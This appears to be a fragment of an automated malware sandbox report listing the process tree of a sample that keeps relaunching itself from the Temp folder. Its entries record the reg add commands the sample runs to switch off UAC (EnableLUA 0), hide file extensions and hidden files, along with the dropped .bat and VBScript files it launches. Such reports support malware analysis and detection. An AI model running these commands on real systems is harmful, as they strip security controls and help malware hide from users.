        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        169⤵
        
        PID:736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        170⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        171⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        172⤵
        
        PID:464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        173⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        173⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        174⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        175⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        176⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        177⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        178⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        179⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        180⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        181⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        182⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        183⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        184⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        185⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        186⤵
        
        PID:212
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        187⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        188⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        189⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        190⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        191⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        192⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        193⤵
        
        PID:820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        194⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        195⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        196⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        197⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        198⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        199⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        200⤵
        
        PID:4088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        201⤵
        
        PID:464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        202⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        203⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        204⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        205⤵
        
        PID:400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        206⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        207⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        208⤵
        
        PID:4276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        209⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        208⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        208⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        206⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        206⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        206⤵
        UAC bypass
        
        PID:1884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lIQYAAsU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        206⤵
        
        PID:384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        207⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        207⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        204⤵
        Modifies registry key
        
        PID:2972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        204⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        204⤵
        UAC bypass
        
        PID:4000
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        205⤵
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mUMsIUog.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        204⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        205⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        202⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        202⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        202⤵
        Modifies registry key
        
        PID:4524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IOoAEwgM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        202⤵
        
        PID:4152
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        203⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        200⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        200⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        200⤵
        Modifies registry key
        
        PID:3856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aYocQgMQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        200⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        201⤵
        
        PID:784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        198⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        198⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        199⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        198⤵
        UAC bypass
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kuEwEwcU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        198⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        199⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        196⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        196⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        196⤵
        UAC bypass
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JsgEkQII.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        196⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        197⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        194⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        194⤵
        Modifies registry key
        
        PID:1948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        194⤵
        UAC bypass
        Modifies registry key
        
        PID:2236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmowcsko.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        194⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        195⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        192⤵
        
        PID:816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        192⤵
        
        PID:1188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        192⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fwQEEokk.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        192⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        193⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        190⤵
        
        PID:1612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        191⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        190⤵
        
        PID:1364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        191⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        190⤵
        UAC bypass
        Modifies registry key
        
        PID:1824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        191⤵
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zcgkoEUs.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        190⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        191⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        188⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        188⤵
        
        PID:2044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        188⤵
        UAC bypass
        
        PID:380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cOMsUcwg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        188⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        189⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        186⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        186⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        186⤵
        UAC bypass
        
        PID:4984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sWQAoYYc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        186⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        187⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        184⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        184⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        184⤵
        Modifies registry key
        
        PID:1652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cAwUEUYU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        184⤵
        
        PID:428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        185⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        182⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        182⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        183⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        182⤵
        UAC bypass
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lMsIIwEs.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        182⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        183⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        180⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        180⤵
        
        PID:988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        180⤵
        UAC bypass
        Modifies registry key
        
        PID:2408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZaYYgkMI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        180⤵
        
        PID:548
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        181⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        178⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        178⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        178⤵
        UAC bypass
        
        PID:4084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rWAksoQY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        178⤵
        
        PID:5052
        
